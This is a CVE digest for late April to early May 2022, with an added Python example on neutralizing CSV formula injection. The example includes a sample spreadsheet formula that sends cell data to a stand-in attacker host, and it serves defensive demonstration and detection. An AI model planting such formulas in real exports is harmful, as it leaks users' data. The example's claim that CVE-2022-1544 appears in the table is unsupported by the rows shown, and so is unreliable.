2022-04-28 | CVE-2022-29821 | Jetbrains | Code Injection vulnerability in Jetbrains Pycharm In JetBrains Rider before 2022.1 local code execution via links in ReSharper Quick Documentation was possible | 7.7 |
2022-05-01 | CVE-2022-21144 | Libxmljs Project | Improper Input Validation vulnerability in Libxmljs Project Libxmljs This affects all versions of package libxmljs. | 7.5 |
2022-05-01 | CVE-2022-21227 | Ghost | Unspecified vulnerability in Ghost Sqlite3 The package sqlite3 before 5.0.3 are vulnerable to Denial of Service (DoS) which will invoke the toString function of the passed parameter. | 7.5 |
2022-05-01 | CVE-2022-25647 | Google Debian Netapp Oracle | Deserialization of Untrusted Data vulnerability in multiple products The package com.google.code.gson:gson before 2.8.9 are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks. | 7.5 |
2022-05-01 | CVE-2022-25844 | Angularjs Fedoraproject Netapp | The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER_FORMATS.PATTERNS[1].posPre with a very high value. | 7.5 |
2022-05-01 | CVE-2022-25850 | Proxyscotch Project | Server-Side Request Forgery (SSRF) vulnerability in Proxyscotch Project Proxyscotch The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. | 7.5 |
2022-05-01 | CVE-2022-26068 | Pistache Project | Path Traversal vulnerability in Pistache Project Pistache This affects the package pistacheio/pistache before 0.0.3.20220425. | 7.5 |
2022-04-30 | CVE-2022-28323 | Mediawiki | Unspecified vulnerability in Mediawiki An issue was discovered in MediaWiki through 1.37.2. | 7.5 |
2022-04-30 | CVE-2022-29265 | Apache | XXE vulnerability in Apache Nifi Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. | 7.5 |
2022-04-29 | CVE-2022-29967 | Glewlwyd Project | Path Traversal vulnerability in Glewlwyd Project Glewlwyd static_compressed_inmemory_website_callback.c in Glewlwyd through 2.6.2 allows directory traversal. | 7.5 |
2022-04-29 | CVE-2022-29945 | DJI | Cleartext Transmission of Sensitive Information vulnerability in DJI products DJI drone devices sold in 2017 through 2022 broadcast unencrypted information about the drone operator's physical location via the AeroScope protocol. | 7.5 |
2022-04-29 | CVE-2022-29935 | USU | Unspecified vulnerability in USU Oracle Optimization 20210817 USU Oracle Optimization before 5.17.5 allows attackers to discover the quantum credentials via an agent-installer download. | 7.5 |
2022-04-29 | CVE-2021-39082 | IBM | Use of a Broken or Risky Cryptographic Algorithm vulnerability in IBM Urbancode Deploy IBM UrbanCode Deploy (UCD) 7.1.1.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 7.5 |
2022-04-29 | CVE-2022-29856 | Automationanywhere | Use of Hard-coded Credentials vulnerability in Automationanywhere Automation 360 22 A hardcoded cryptographic key in Automation360 22 allows an attacker to decrypt exported RPA packages. | 7.5 |
2022-04-29 | CVE-2021-41942 | Msvod | SQL Injection vulnerability in Msvod CMS 10 The Magic CMS MSVOD v10 video system has a SQL injection vulnerability. | 7.5 |
2022-04-28 | CVE-2022-28060 | Victor CMS Project | SQL Injection vulnerability in Victor CMS Project Victor CMS 1.0 SQL Injection vulnerability in Victor CMS v1.0, via the user_name parameter to /includes/login.php. | 7.5 |
2022-04-28 | CVE-2022-29585 | Mahara | Incorrect Default Permissions vulnerability in Mahara In Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0, a site using Isolated Institutions is vulnerable if more than ten groups are used. | 7.5 |
2022-04-28 | CVE-2022-22781 | Zoom | Improper Validation of Integrity Check Value vulnerability in Zoom Meetings The Zoom Client for Meetings for MacOS (Standard and for IT Admin) prior to version 5.9.6 failed to properly check the package version during the update process. | 7.5 |
2022-04-28 | CVE-2022-22783 | Zoom | Unspecified vulnerability in Zoom products A vulnerability in Zoom On-Premise Meeting Connector Controller version 4.8.102.20220310 and On-Premise Meeting Connector MMR version 4.8.102.20220310 exposes process memory fragments to connected clients, which could be observed by a passive attacker. | 7.5 |
2022-04-28 | CVE-2022-24879 | Shopware | Cross-Site Request Forgery (CSRF) vulnerability in Shopware Shopware is an open source e-commerce software platform. | 7.5 |
2022-04-28 | CVE-2022-24892 | Shopware | Weak Password Recovery Mechanism for Forgotten Password vulnerability in Shopware Shopware is an open source e-commerce software platform. | 7.5 |
2022-04-28 | CVE-2022-24935 | Lexmark | Missing Authentication for Critical Function vulnerability in Lexmark Firmware Lexmark products through 2022-02-10 have Incorrect Access Control. | 7.5 |
2022-04-27 | CVE-2021-3523 | Redhat | Improper Preservation of Permissions vulnerability in Redhat Apicast 2.0.0 A flaw was found in 3Scale APICast in versions prior to 2.11.0, where it incorrectly identified connections for reuse. | 7.5 |
2022-04-27 | CVE-2022-22275 | Sonicwall | Unspecified vulnerability in Sonicwall Sonicos Improper restriction of the TCP communication channel for HTTP/S inbound traffic from WAN to DMZ bypasses the security policy until the TCP handshake completes, potentially resulting in a Denial of Service (DoS) attack if the target host is vulnerable. | 7.5 |
2022-04-27 | CVE-2022-22278 | Sonicwall | Allocation of Resources Without Limits or Throttling vulnerability in Sonicwall products A vulnerability in SonicOS CFS (Content Filtering Service) returns a large 403 Forbidden HTTP response message to the source address when users try to access a prohibited resource, which allows an attacker to cause an HTTP Denial of Service (DoS) attack. | 7.5 |
2022-04-27 | CVE-2021-34589 | Bender | Unspecified vulnerability in Bender products Bender/ebee Charge Controllers in multiple versions are prone to an RFID leak. | 7.5 |
2022-04-27 | CVE-2021-38878 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar 7.3, 7.4, and 7.5 could allow a malicious actor to impersonate an actor due to key exchange without entity authentication. | 7.5 |
2022-04-27 | CVE-2021-38919 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 in some scenarios may reveal authorized service tokens to other QRadar users. | 7.5 |
2022-04-27 | CVE-2021-46420 | Franklinfueling | Path Traversal vulnerability in Franklinfueling Ts-550 EVO Firmware 2.23.4.8936 Franklin Fueling Systems FFS TS-550 evo 2.23.4.8936 is affected by an unauthenticated directory traversal vulnerability, which allows an attacker to obtain sensitive information. | 7.5 |
2022-04-27 | CVE-2021-46421 | Franklinfueling | Path Traversal vulnerability in Franklinfueling Ts-550 EVO Firmware 1.8.7.7299 Franklin Fueling Systems FFS T5 Series 1.8.7.7299 is affected by an unauthenticated directory traversal vulnerability, which allows an attacker to obtain sensitive information. | 7.5 |
2022-04-27 | CVE-2022-29700 | Zammad | Weak Password Requirements vulnerability in Zammad 5.1.0 A lack of password length restriction in Zammad v5.1.0 allows for the creation of extremely long passwords which can cause a Denial of Service (DoS) during password verification. | 7.5 |
2022-04-27 | CVE-2022-29701 | Zammad | Allocation of Resources Without Limits or Throttling vulnerability in Zammad 5.1.0 A lack of rate limiting in the 'forgot password' feature of Zammad v5.1.0 allows attackers to send an excessive amount of reset requests for a legitimate user, leading to a possible Denial of Service (DoS) via a large amount of generated e-mail messages. | 7.5 |
2022-04-26 | CVE-2022-23942 | Apache | Use of Hard-coded Credentials vulnerability in Apache Doris Apache Doris, prior to 1.0.0, used a hardcoded key and IV to initialize the cipher used for ldap password, which may lead to information disclosure. | 7.5 |
2022-04-26 | CVE-2022-24882 | Freerdp Fedoraproject | FreeRDP is a free implementation of the Remote Desktop Protocol (RDP). | 7.5 |
2022-04-25 | CVE-2021-35250 | Solarwinds | Path Traversal vulnerability in Solarwinds Serv-U 15.3 A researcher reported a Directory Traversal vulnerability in Serv-U 15.3. | 7.5 |
2022-04-25 | CVE-2022-0656 | Webtoprint | Unspecified vulnerability in Webtoprint web to Print Shop:Udraw The Web To Print Shop : uDraw WordPress plugin before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. | 7.5 |
2022-04-25 | CVE-2022-1392 | Commoninja | Unspecified vulnerability in Commoninja Videos Sync PDF The Videos sync PDF WordPress plugin through 1.7.4 does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues | 7.5 |
2022-04-25 | CVE-2022-24792 | Teluu Debian | PJSIP is a free and open source multimedia communication library written in C. | 7.5 |
2022-04-25 | CVE-2021-45842 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to obtain the first administrator's hash set up in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) on the system as well as other information such as MAC address, internal IP address etc. | 7.5 |
2022-04-25 | CVE-2022-28871 | F Secure | Allocation of Resources Without Limits or Throttling vulnerability in F-Secure Atlant A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant: the fsicapd component used in certain F-Secure products consumes too much memory while scanning larger packages or fuzzed files, which can eventually crash the scanning engine. | 7.5 |
2022-04-25 | CVE-2022-29546 | Htmlunit | Unspecified vulnerability in Htmlunit HtmlUnit NekoHtml Parser before 2.61.0 suffers from a denial of service vulnerability. | 7.5 |
2022-04-28 | CVE-2021-33436 | Nomachine | Unspecified vulnerability in Nomachine NoMachine for Windows prior to versions 6.15.1 and 7.5.2 suffers from local privilege escalation due to the lack of safe DLL loading. | 7.3 |
2022-04-27 | CVE-2022-27905 | Controlup | Unquoted Search Path or Element vulnerability in Controlup In ControlUp Real-Time Agent before 8.6, an unquoted path can result in privilege escalation. | 7.2 |
2022-04-29 | CVE-2022-1402 | Deltaww | Unspecified vulnerability in Deltaww Asda Soft 5.4.1.0 ASDA-Soft: Version 5.4.1.0 and prior does not properly sanitize input while processing a specific project file, allowing a possible out-of-bounds read condition. | 7.1 |
2022-04-29 | CVE-2022-1114 | Imagemagick | Use After Free vulnerability in Imagemagick A heap-use-after-free flaw was found in ImageMagick's RelinquishDCMInfo() function of dcm.c file. | 7.1 |
2022-04-29 | CVE-2022-1353 | Linux Debian Redhat Netapp | A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. | 7.1 |
2022-04-29 | CVE-2022-1534 | Libmobi Project | Out-of-bounds Read vulnerability in Libmobi Project Libmobi Buffer Over-read at parse_rawml.c:1416 in GitHub repository bfabiszewski/libmobi prior to 0.11. | 7.1 |
2022-04-28 | CVE-2022-22782 | Zoom | Unspecified vulnerability in Zoom products The Zoom Client for Meetings for Windows prior to version 5.9.7, Zoom Rooms for Conference Room for Windows prior to version 5.10.0, Zoom Plugins for Microsoft Outlook for Windows prior to version 5.10.3, and Zoom VDI Windows Meeting Clients prior to version 5.9.6; was susceptible to a local privilege escalation issue during the installer repair operation. | 7.1 |
2022-04-28 | CVE-2022-29818 | Jetbrains | Origin Validation Error vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 origin checks in the internal web server were flawed | 7.1 |
2022-04-29 | CVE-2022-1048 | Linux Redhat Debian Netapp | Use After Free vulnerability in multiple products A use-after-free flaw was found in the Linux kernel’s sound subsystem in the way a user triggers concurrent calls of PCM hw_params. | 7.0 |
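Several rows in the high-severity table above fall under the same weakness class, "Improper Neutralization of Formula Elements in a CSV File" (CVE-2022-1544 in luyadev/yii-helpers is the one listed here). The defense is mechanical, so the following added example shows it in Python. This is illustrative code written for this report, not code from yii-helpers or any other project in the table; the trigger-character set follows the OWASP CSV injection guidance (`=`, `+`, `-`, `@`, tab, carriage return), and the sample rows are constructed for the demonstration.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate a cell as a formula
# (or a DDE command) when the exported file is opened. Set per OWASP guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export: the last row carries an attacker-supplied comment
# that would become a clickable HYPERLINK formula in a spreadsheet.
SAMPLE_ROWS = [
    ["name", "comment"],
    ["alice", "hello"],
    ["mallory", '=HYPERLINK("http://evil.example/?"&A1,"click")'],
]


def neutralize_cell(value):
    """Return the cell as text a spreadsheet will not evaluate.

    A leading single quote marks the cell as literal text in Excel and
    LibreOffice. None becomes an empty string; everything else is stringified.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows, neutralize=True):
    """Serialize rows to CSV text.

    QUOTE_ALL wraps every field in double quotes and doubles embedded quotes,
    which keeps an injected comma or quote from breaking out of its cell.
    neutralize=False reproduces the vulnerable behaviour for comparison.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if neutralize else c for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit an existing CSV: list (row, col, value) for cells that start
    with a formula trigger. Useful as a check on exports you did not write."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    unsafe = export_rows(SAMPLE_ROWS, neutralize=False)
    safe = export_rows(SAMPLE_ROWS)
    print("flagged cells in unsafe export:", find_formula_cells(unsafe))
    print("flagged cells in safe export:  ", find_formula_cells(safe))
    print(safe)
```

The trade-off to know about: the same rule turns a legitimate negative number such as `-5` into `'-5`, so apply it only to free-text columns, or convert numeric columns to numbers explicitly before export. Quoting alone (`QUOTE_ALL`) does not stop formula evaluation; spreadsheet importers strip the quotes before deciding whether a cell is a formula, which is why the prefix is needed as well.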
129 Medium Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-29 | CVE-2022-28198 | Nvidia | Unspecified vulnerability in Nvidia Omniverse Cache and Omniverse Nucleus NVIDIA Omniverse Nucleus and Cache contain a vulnerability in its configuration of OpenSSL, where an attacker with physical access to the system can cause arbitrary code execution which can impact confidentiality, integrity, and availability. | 6.8 |
2022-04-27 | CVE-2022-23822 | Xilinx | Incorrect Authorization vulnerability in Xilinx Zynq-7000 Firmware and Zynq-7000S Firmware In this physical attack, an attacker may potentially exploit the Zynq-7000 SoC First Stage Boot Loader (FSBL) by bypassing authentication and loading a malicious image onto the device. | 6.8 |
2022-04-28 | CVE-2022-29813 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via custom Pandoc path was possible | 6.7 |
2022-04-28 | CVE-2022-29815 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via workspace settings was possible | 6.7 |
2022-04-29 | CVE-2022-1015 | Linux Fedoraproject | Out-of-bounds Write vulnerability in multiple products A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. | 6.6 |
2022-04-28 | CVE-2022-22441 | IBM | Unspecified vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 could allow an authenticated user to view information of higher privileged users and groups due to a privilege escalation vulnerability. | 6.5 |
2022-04-28 | CVE-2022-1511 | Snipeitapp | Unspecified vulnerability in Snipeitapp Snipe-It Missing Authorization in GitHub repository snipe/snipe-it prior to 5.4.4. | 6.5 |
2022-04-27 | CVE-2022-22312 | IBM | Out-of-bounds Write vulnerability in IBM Security Verify Password Synchronization IBM Security Identity Manager (IBM Security Verify Password Synchronization Plug-in for Windows AD 10.x) is vulnerable to a denial of service, caused by a heap-based buffer overflow in the Password Synch Plug-in. | 6.5 |
2022-04-27 | CVE-2022-22323 | IBM | Out-of-bounds Write vulnerability in IBM Security Verify Password Synchronization IBM Security Identity Manager (IBM Security Verify Password Synchronization Plug-in for Windows AD 10.x) is vulnerable to a denial of service, caused by a heap-based buffer overflow in the Password Synch Plug-in. | 6.5 |
2022-04-26 | CVE-2022-1466 | Redhat | Incorrect Authorization vulnerability in Redhat Keycloak Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions that they should not be allowed to perform. | 6.5 |
2022-04-25 | CVE-2022-27374 | Tenda | Cross-Site Request Forgery (CSRF) vulnerability in Tenda Ax12 Firmware 22.03.01.21Cn Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via the function sub_42E328 at /goform/SysToolReboot. | 6.5 |
2022-04-25 | CVE-2022-27375 | Tenda | Cross-Site Request Forgery (CSRF) vulnerability in Tenda Ax12 Firmware 22.03.01.21Cn Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via the function sub_422168 at /goform/WifiExtraSet. | 6.5 |
2022-04-25 | CVE-2021-45839 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to obtain the first administrator's hash set up on the system in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) as well as other information such as MAC address, internal IP address etc. | 6.5 |
2022-04-25 | CVE-2022-1461 | Open EMR | Authorization Bypass Through User-Controlled Key vulnerability in Open-Emr Openemr Non Privilege User can Enable or Disable Registered in GitHub repository openemr/openemr prior to 6.1.0.1. | 6.5 |
2022-04-29 | CVE-2022-29947 | Woodpecker CI | Cross-site Scripting vulnerability in Woodpecker-Ci Woodpecker Woodpecker before 0.15.1 allows XSS via build logs because web/src/components/repo/build/BuildLog.vue lacks escaping. | 6.1 |
2022-04-29 | CVE-2022-1530 | Livehelperchat | Cross-site Scripting vulnerability in Livehelperchat Live Helper Chat Cross-site Scripting (XSS) in GitHub repository livehelperchat/livehelperchat prior to 3.99v. | 6.1 |
2022-04-29 | CVE-2022-29907 | Mediawiki | Cross-site Scripting vulnerability in Mediawiki The Nimbus skin for MediaWiki through 1.37.2 (before 6f9c8fb868345701d9544a54d9752515aace39df) allows XSS in Advertise link messages. | 6.1 |
2022-04-28 | CVE-2022-28454 | Limbas | Cross-site Scripting vulnerability in Limbas 4.3.36.1319 Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS). | 6.1 |
2022-04-28 | CVE-2022-28477 | Wbce | Cross-site Scripting vulnerability in Wbce CMS 1.5.2 WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS). | 6.1 |
2022-04-28 | CVE-2022-29413 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress via &title parameter. | 6.1 |
2022-04-28 | CVE-2022-22427 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 6.1 |
2022-04-28 | CVE-2022-27860 | Footer Text Project | Unspecified vulnerability in Footer-Text Project Footer-Text Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) in Shea Bunge's Footer Text plugin <= 2.0.3 on WordPress. | 6.1 |
2022-04-28 | CVE-2022-29415 | Ravpage Project | Unspecified vulnerability in Ravpage Project Ravpage 2.16 Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in Mati Skiba @ Rav Messer's Ravpage plugin <= 2.16 at WordPress. | 6.1 |
2022-04-28 | CVE-2021-43932 | Smartptt | Cross-site Scripting vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable when an attacker injects JavaScript code into a specific parameter that can be executed upon accessing the dashboard or the main page. | 6.1 |
2022-04-28 | CVE-2022-24873 | Shopware | Cross-site Scripting vulnerability in Shopware Shopware is an open source e-commerce software platform. | 6.1 |
2022-04-28 | CVE-2022-29152 | Ericom | Cross-site Scripting vulnerability in Ericom Powerterm Webconnect 6.0 The Ericom PowerTerm WebConnect 6.0 login portal can unsafely write an XSS payload from the AppPortal cookie into the page. | 6.1 |
2022-04-28 | CVE-2022-29817 | Jetbrains | Cross-site Scripting vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 reflected XSS via error messages in internal web server was possible | 6.1 |
2022-04-27 | CVE-2022-24891 | Owasp Oracle Netapp | ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. | 6.1 |
2022-04-27 | CVE-2022-24887 | Nextcloud | Open Redirect vulnerability in Nextcloud Talk Nextcloud Talk is a video and audio conferencing app for Nextcloud, a self-hosted productivity platform. | 6.1 |
2022-04-27 | CVE-2022-1504 | Microweber | Cross-site Scripting vulnerability in Microweber XSS in /demo/module/?module=HERE in GitHub repository microweber/microweber prior to 1.2.15. | 6.1 |
2022-04-26 | CVE-2022-26564 | Digitaldruid | Cross-site Scripting vulnerability in Digitaldruid Hoteldruid 3.0.3 HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. | 6.1 |
2022-04-26 | CVE-2022-28449 | Nopcommerce | Cross-site Scripting vulnerability in Nopcommerce 4.50.1 nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). | 6.1 |
2022-04-26 | CVE-2021-26628 | Maxb | Cross-site Scripting vulnerability in Maxb Maxboard 1.9.6 Insufficient script validation of the admin page enables XSS, which causes unauthorized users to steal admin privileges. | 6.1 |
2022-04-26 | CVE-2021-36895 | Tripetto | Unspecified vulnerability in Tripetto Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload. | 6.1 |
2022-04-25 | CVE-2022-28290 | Welaunch | Cross-site Scripting vulnerability in Welaunch Wordpress Country Selector 1.6.5 Reflected Cross-Site Scripting vulnerability in WordPress Country Selector Plugin Version 1.6.5. | 6.1 |
2022-04-25 | CVE-2021-25111 | English Wordpress Admin Project | Unspecified vulnerability in English Wordpress Admin Project English Wordpress Admin The English WordPress Admin WordPress plugin before 1.5.2 does not validate the admin_custom_language_return_url before redirecting users to it, leading to an open redirect issue. | 6.1 |
2022-04-25 | CVE-2021-46780 | Supsystic | Unspecified vulnerability in Supsystic Easy Google Maps The Easy Google Maps WordPress plugin before 1.9.32 does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting | 6.1 |
2022-04-25 | CVE-2021-46781 | Supsystic | Unspecified vulnerability in Supsystic Coming Soon The Coming Soon by Supsystic WordPress plugin before 1.7.6 does not sanitise and escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting | 6.1 |
2022-04-25 | CVE-2021-46782 | Supsystic | Unspecified vulnerability in Supsystic Price Table The Pricing Table by Supsystic WordPress plugin before 1.9.5 does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting | 6.1 |
2022-04-25 | CVE-2022-0953 | Download Anti Malware Security AND Brute Force Firewall Project | Unspecified vulnerability in Download Anti-Malware Security and Brute-Force Firewall Project Download Anti-Malware Security and Brute-Force Firewall The Anti-Malware Security and Brute-Force Firewall WordPress plugin before 4.20.96 does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters | 6.1 |
2022-04-25 | CVE-2022-26596 | Liferay | Cross-site Scripting vulnerability in Liferay Digital Experience Platform 7.0/7.1/7.2 Cross-site scripting (XSS) vulnerability in Journal module's web content display configuration page in Liferay Portal 7.1.0 through 7.3.3, and Liferay DXP 7.0 before fix pack 94, 7.1 before fix pack 19, and 7.2 before fix pack 8, allows remote attackers to inject arbitrary web script or HTML via web content template names. | 6.1 |
2022-04-25 | CVE-2022-26597 | Liferay | Cross-site Scripting vulnerability in Liferay Digital Experience Platform 7.0/7.3 Cross-site scripting (XSS) vulnerability in the Layout module's Open Graph integration in Liferay Portal 7.3.0 through 7.4.0, and Liferay DXP 7.3 before service pack 3 allows remote attackers to inject arbitrary web script or HTML via the site name. | 6.1 |
2022-04-25 | CVE-2022-28094 | Online Sports Complex Booking System Project | Cross-site Scripting vulnerability in Online Sports Complex Booking System Project Online Sports Complex Booking System 1.0 SCBS Online Sports Venue Reservation System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the fid parameter at booking.php. | 6.1 |
2022-04-25 | CVE-2022-27103 | Element Plus | Cross-site Scripting vulnerability in Element-Plus 2.0.5 element-plus 2.0.5 is vulnerable to Cross Site Scripting (XSS) via el-table-column. | 6.1 |
2022-04-25 | CVE-2022-28586 | Hoosk | Cross-site Scripting vulnerability in Hoosk 1.8.0 XSS in the edit page of Hoosk 1.8.0 allows an attacker to execute JavaScript code in the user's browser via an XSS payload that bypasses the filter for some special characters. | 6.1 |
2022-04-27 | CVE-2022-28195 | Nvidia | Integer Overflow or Wraparound vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot ext4_read_file function, where insufficient validation of untrusted data may allow a highly privileged local attacker to cause an integer overflow, which may lead to code execution, escalation of privileges, limited denial of service, and some impact to confidentiality and integrity. | 5.7 |
2022-04-30 | CVE-2021-41992 | Pingidentity | Improper Authentication vulnerability in Pingidentity Pingid Integration for Windows Login A misconfiguration of RSA in PingID Windows Login prior to 2.7 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass. | 5.6 |
2022-04-27 | CVE-2022-28193 | Nvidia | Out-of-bounds Write vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot module tegrabl_cbo.c, where insufficient validation of untrusted data may allow a local attacker with elevated privileges to cause a memory buffer overflow, which may lead to code execution, loss of integrity, limited denial of service, and some impact to confidentiality. | 5.6 |
2022-04-27 | CVE-2022-28194 | Nvidia | Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot module tegrabl_cbo.c, where, if TFTP is enabled, a local attacker with elevated privileges can cause a memory buffer overflow, which may lead to code execution, loss of Integrity, limited denial of service, and some impact to confidentiality. | 5.6 |
2022-05-01 | CVE-2022-21230 | Nanohttpd | Unspecified vulnerability in Nanohttpd This affects all versions of package org.nanohttpd:nanohttpd. | 5.5 |
2022-04-29 | CVE-2021-3982 | Gnome | Improper Check for Dropped Privileges vulnerability in Gnome Gnome-Shell Linux distributions using CAP_SYS_NICE for gnome-shell may be exposed to a privilege escalation issue. | 5.5 |
2022-04-29 | CVE-2022-1195 | Linux Debian | Use After Free vulnerability in multiple products A use-after-free vulnerability was found in the Linux kernel in drivers/net/hamradio. | 5.5 |
2022-04-27 | CVE-2022-24736 | Redis Fedoraproject Netapp Oracle | Redis is an in-memory database that persists on disk. | 5.5 |
2022-04-27 | CVE-2022-1507 | Chafa Project Fedoraproject | NULL Pointer Dereference vulnerability in multiple products chafa: NULL Pointer Dereference in function gif_internal_decode_frame at libnsgif.c:599 allows attackers to cause a denial of service (crash) via a crafted input file. | 5.5 |
2022-04-27 | CVE-2022-29810 | Hashicorp | Information Exposure Through Log Files vulnerability in Hashicorp Go-Getter The Hashicorp go-getter library before 1.5.11 does not redact an SSH key from a URL query parameter. | 5.5 |
2022-04-26 | CVE-2022-27888 | Palantir | Information Exposure Through Log Files vulnerability in Palantir Foundry Issues Foundry Issues service versions 2.244.0 to 2.249.0 was found to be logging in a manner that captured sensitive information (session tokens). | 5.5 |
2022-04-26 | CVE-2022-28218 | Ciphermail | Incorrect Default Permissions vulnerability in Ciphermail Webmail Messenger An issue was discovered in CipherMail Webmail Messenger 1.1.1 through 4.1.4. | 5.5 |
2022-04-25 | CVE-2022-27135 | Xpdfreader | Out-of-bounds Write vulnerability in Xpdfreader Xpdf 4.03 xpdf 4.03 has heap buffer overflow in the function readXRefTable located in XRef.cc. | 5.5 |
2022-04-25 | CVE-2022-28506 | Giflib Project Fedoraproject | Out-of-bounds Write vulnerability in multiple products There is a heap-buffer-overflow in GIFLIB 5.2.1 function DumpScreen2RGB() in gif2rgb.c:298:45. | 5.5 |
2022-05-01 | CVE-2022-25349 | Materializecss | Cross-site Scripting vulnerability in Materializecss Materialize All versions of package materialize-css are vulnerable to Cross-site Scripting (XSS) due to improper escape of user input (such as <not-a-tag />) that is being parsed as HTML/JavaScript, and inserted into the Document Object Model (DOM). | 5.4 |
2022-04-29 | CVE-2022-25854 | Tagify Project | Cross-site Scripting vulnerability in Tagify Project Tagify This affects the package @yaireo/tagify before 4.9.8. | 5.4 |
2022-04-29 | CVE-2022-29414 | Wpkube | Unspecified vulnerability in Wpkube Subscribe to Comments Reloaded Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription. | 5.4 |
2022-04-29 | CVE-2021-41948 | Intelliants | Cross-site Scripting vulnerability in Intelliants Subrion A cross-site scripting (XSS) vulnerability exists in the "contact us" plugin for Subrion CMS <= 4.2.1 version via "List of subjects". | 5.4 |
2022-04-29 | CVE-2022-1536 | Automad | Cross-site Scripting vulnerability in Automad A vulnerability has been found in automad up to 1.10.9 and classified as problematic. | 5.4 |
2022-04-29 | CVE-2022-1526 | Emlog | Cross-site Scripting vulnerability in Emlog A vulnerability, which was classified as problematic, was found in Emlog Pro up to 1.2.2. | 5.4 |
2022-04-28 | CVE-2022-29412 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Hermit ????? plugin <= 3.1.6 on WordPress allow attackers to delete cache, delete a source, create source. | 5.4 |
2022-04-28 | CVE-2021-38952 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 5.4 |
